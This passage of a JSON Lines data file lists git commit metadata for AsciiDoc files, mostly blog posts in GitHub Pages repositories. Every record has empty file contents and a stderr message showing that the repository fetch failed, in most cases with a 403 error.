2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"722ee4917a50f4456b6d486daa860922436ded9a","subject":"Minor fix","message":"Minor 
fix","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c9e6f176561f402e01f0a1734915600d58d240f","subject":"Update 2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","message":"Update 2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","new_file":"_posts\/2011-08-04-Creer-un-tag-svn-en-utilisant-Ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a7401f258051b7fa6c15af9691d3b0a265f76e9","subject":"Update 2017-01-17-Ideas.adoc","message":"Update 2017-01-17-Ideas.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2017-01-17-Ideas.adoc","new_file":"_posts\/2017-01-17-Ideas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31423a08ac9917744d179855ee2dcf1d383798c4","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70fbbdde139d92410d88c3d98eadb011dcd6316d","subject":"Proposing a rule prerequisites section ","message":"Proposing a rule prerequisites section \n\nas discussed","repos":"redhat-italy\/hacep,redhat-italy\/hacep,redhat-italy\/hacep,redhat-italy\/hacep","old_file":"doc\/prerequisites.adoc","new_file":"doc\/prerequisites.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-italy\/hacep.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"003bcdf72c2d8c8ff45aa70b9f906a800a24c71e","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f6c8a54c440ceef4a5f3b8d2efd86e548459ac0","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76aea0a428822a84bf8b8bf83bb27dc59a9844d0","subject":"Update 2016-11-07-202800-Monday-Evening.adoc","message":"Update 2016-11-07-202800-Monday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-202800-Monday-Evening.adoc","new_file":"_posts\/2016-11-07-202800-Monday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf27ab3aae04e7ed990c5d5d364b21679808da2e","subject":"Cannot scale network in a stack","message":"Cannot scale network in a stack","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e71701ed557d36692ab0cfc5c0fcad1acd6b1446","subject":"Per workspace","message":"Per workspace\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested 
URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3586ee1cefdd691a2ec2f928440254606374f67f","subject":"added exercise 1 folder","message":"added exercise 1 folder\n","repos":"christer155\/javaee-exercises,ivargrimstad\/javaee-exercises,cybercomsweden\/javaee-exercises,ivargrimstad\/javaee-exercises,christer155\/javaee-exercises,cybercomsweden\/javaee-exercises","old_file":"exercise-1\/README.adoc","new_file":"exercise-1\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/javaee-exercises.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bd0eae04813369340e9844e91d065870a14d960","subject":"Update 2016-04-19-Code-Contracts.adoc","message":"Update 2016-04-19-Code-Contracts.adoc","repos":"mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io","old_file":"_posts\/2016-04-19-Code-Contracts.adoc","new_file":"_posts\/2016-04-19-Code-Contracts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrcouthy\/mrcouthy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80e850d93d7328b3c65502c1ae68f920228a9583","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"b41f6ce6d59cba03ede1d6e9c16b0a80a942809a","subject":"Checkstyle init","message":"Checkstyle init\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"DevOps\/Checkstyle.adoc","new_file":"DevOps\/Checkstyle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"499412c6e8a9d2e79f1f8f7f0735d84d4f3bbff9","subject":"Update MacOS_X_Challenge-Response.adoc","message":"Update MacOS_X_Challenge-Response.adoc","repos":"eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam","old_file":"doc\/MacOS_X_Challenge-Response.adoc","new_file":"doc\/MacOS_X_Challenge-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b02fe30488ecafe4fab77c0f05c0be3bd6eb2391","subject":"Update 2017-01-17-Book-Review.adoc","message":"Update 
2017-01-17-Book-Review.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-01-17-Book-Review.adoc","new_file":"_posts\/2017-01-17-Book-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a6227ef5bf299fa2453d6784bdcb0583acbac49","subject":"Update 2015-07-27-A-test-title.adoc","message":"Update 2015-07-27-A-test-title.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-07-27-A-test-title.adoc","new_file":"_posts\/2015-07-27-A-test-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58fc21d03a556ce5f686a2dae1e50fc04bee30cd","subject":"Update 2018-11-01-gohu-netlify.adoc","message":"Update 2018-11-01-gohu-netlify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"018950ad86f8047d7e24f5e806806cee4dff9da7","subject":"Update 2018-08-11-sweet-honey.adoc","message":"Update 2018-08-11-sweet-honey.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-08-11-sweet-honey.adoc","new_file":"_posts\/2018-08-11-sweet-honey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68eb55c14f80e21a86e6593591f7688d20b4e58a","subject":"Update 2016-09-09.adoc","message":"Update 2016-09-09.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"_posts\/2016-09-09.adoc","new_file":"_posts\/2016-09-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49424c2eabf28740be3b57c66f90e4e3255f80fe","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66664293a38d35746b8357f0c838b69b1027d7e9","subject":"y2b create post The Drone You've Been Waiting For...","message":"y2b create post The Drone You've Been Waiting 
For...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-15-The-Drone-Youve-Been-Waiting-For.adoc","new_file":"_posts\/2016-09-15-The-Drone-Youve-Been-Waiting-For.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36b39189b41737356b4307976baf8e3b95555ee6","subject":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","message":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a78fb838249d40fea9a9afea074d3364582743b","subject":"Update 2016-12-08-My-Development-Environment-Setup.adoc","message":"Update 2016-12-08-My-Development-Environment-Setup.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b7b7cbc73c4b85e6c1de7e37e0b65545002e840","subject":"Update 2017-05-12-Verantwortung-Handlung-Intention.adoc","message":"Update 2017-05-12-Verantwortung-Handlung-Intention.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-12-Verantwortung-Handlung-Intention.adoc","new_file":"_posts\/2017-05-12-Verantwortung-Handlung-Intention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2510e83f4568af7129fc03e2013147fab9c1002f","subject":"Update 2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","message":"Update 2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","new_file":"_posts\/2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1131e3b47d35921e164f1ffdc64fc35dc6381aa","subject":"Update 2019-03-12-A-B.adoc","message":"Update 
2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96183bd8930fb9036879b9acb9ad8491035f5572","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/11\/04\/deref.adoc","new_file":"content\/news\/2022\/11\/04\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f5a3b81b63d61962485be8f80cf9510b4b3f7f02","subject":"Captain's Log FAQ (edit)","message":"Captain's Log FAQ (edit)\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2722fb3bfccd7a8d544cbea4ec3e5340093973bf","subject":"Update 2017-05-19-Rust-in-action.adoc","message":"Update 2017-05-19-Rust-in-action.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2017-05-19-Rust-in-action.adoc","new_file":"_posts\/2017-05-19-Rust-in-action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa8fd408a8a651b93a2ac7b4033575798ed274cc","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a73c2bbdfb2d644246de285893e5fc4c633a64b8","subject":"Update 2015-03-02-MySQL-Docker.adoc","message":"Update 2015-03-02-MySQL-Docker.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-03-02-MySQL-Docker.adoc","new_file":"_posts\/2015-03-02-MySQL-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60a78c34f157bb445fdb812881559414a4ee404c","subject":"Update 2017-07-18-July-18-2017.adoc","message":"Update 
2017-07-18-July-18-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-18-July-18-2017.adoc","new_file":"_posts\/2017-07-18-July-18-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be0fcf5b6915f0c105067f3c91053abd12740a01","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c9df8b3425ff8e7e36a273fbc14026c9cc10c99","subject":"Update 2008-02-18-Non-sense.adoc","message":"Update 2008-02-18-Non-sense.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2008-02-18-Non-sense.adoc","new_file":"_posts\/2008-02-18-Non-sense.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75951ec4e3490794b3286c373488e9b28eecd6ef","subject":"Update 2017-12-31-Seventeen.adoc","message":"Update 2017-12-31-Seventeen.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-12-31-Seventeen.adoc","new_file":"_posts\/2017-12-31-Seventeen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a59df8cd6406146ae5403c09b193d133ef36ba31","subject":"Higher-order README.","message":"Higher-order README.\n","repos":"mstahv\/wildfly-swarm-examples,emag\/wildfly-swarm-examples,wildfly-swarm\/wildfly-swarm-examples,emag\/wildfly-swarm-examples,wildfly-swarm\/wildfly-swarm-examples,mstahv\/wildfly-swarm-examples,wildfly-swarm\/wildfly-swarm-examples,mstahv\/wildfly-swarm-examples,wildfly-swarm\/wildfly-swarm-examples,emag\/wildfly-swarm-examples,wildfly-swarm\/wildfly-swarm-examples,mstahv\/wildfly-swarm-examples,emag\/wildfly-swarm-examples,emag\/wildfly-swarm-examples,emag\/wildfly-swarm-examples,wildfly-swarm\/wildfly-swarm-examples","old_file":"datasource\/README.adoc","new_file":"datasource\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emag\/wildfly-swarm-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9dedbea86539815bc5f4103763c94a179e2c51f1","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 
2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db43bbebf69875582d4517118b558e18b287c7ae","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"687ecf72eb580b8fe7b8a68174021ec1cb7667e3","subject":"Clean up and add API items to TEP template","message":"Clean up and add API items to TEP template\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>\n","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/tep\/tep-0001.adoc","new_file":"docs\/tep\/tep-0001.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a82eedab41af251685c5539df5d61e280e741cfa","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2539db0947149752bc6e99638297658b35f57277","subject":"Update 2015-02-13-PHP-and-HTML-Select-field-fur-die-letzten-100-Jahre-inkl-Altersgrenze.adoc","message":"Update 2015-02-13-PHP-and-HTML-Select-field-fur-die-letzten-100-Jahre-inkl-Altersgrenze.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-13-PHP-and-HTML-Select-field-fur-die-letzten-100-Jahre-inkl-Altersgrenze.adoc","new_file":"_posts\/2015-02-13-PHP-and-HTML-Select-field-fur-die-letzten-100-Jahre-inkl-Altersgrenze.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15048c851cfd4f7bdca49305ac93194bb97b845d","subject":"chore(controlable-tests): fix typo","message":"chore(controlable-tests): fix 
typo\n","repos":"charlenopires\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,cqricky\/promises-book,dieface\/promises-book,charlenopires\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,xifeiwu\/promises-book,lidasong2014\/promises-book,azu\/promises-book,genie88\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,wenber\/promises-book,tangjinzhou\/promises-book,liyunsheng\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,genie88\/promises-book,purepennons\/promises-book,liubin\/promises-book,mzbac\/promises-book,purepennons\/promises-book,cqricky\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,tangjinzhou\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,mzbac\/promises-book,wenber\/promises-book,wenber\/promises-book,azu\/promises-book,xifeiwu\/promises-book,tangjinzhou\/promises-book,cqricky\/promises-book,oToUC\/promises-book,azu\/promises-book,wangwei1237\/promises-book,mzbac\/promises-book,azu\/promises-book,liubin\/promises-book,liubin\/promises-book,sunfurong\/promise,oToUC\/promises-book","old_file":"Ch3_Testing\/controlable-tests.adoc","new_file":"Ch3_Testing\/controlable-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1bf90a73128c07d7ae97f0ed187f0020e30d0be","subject":"Update 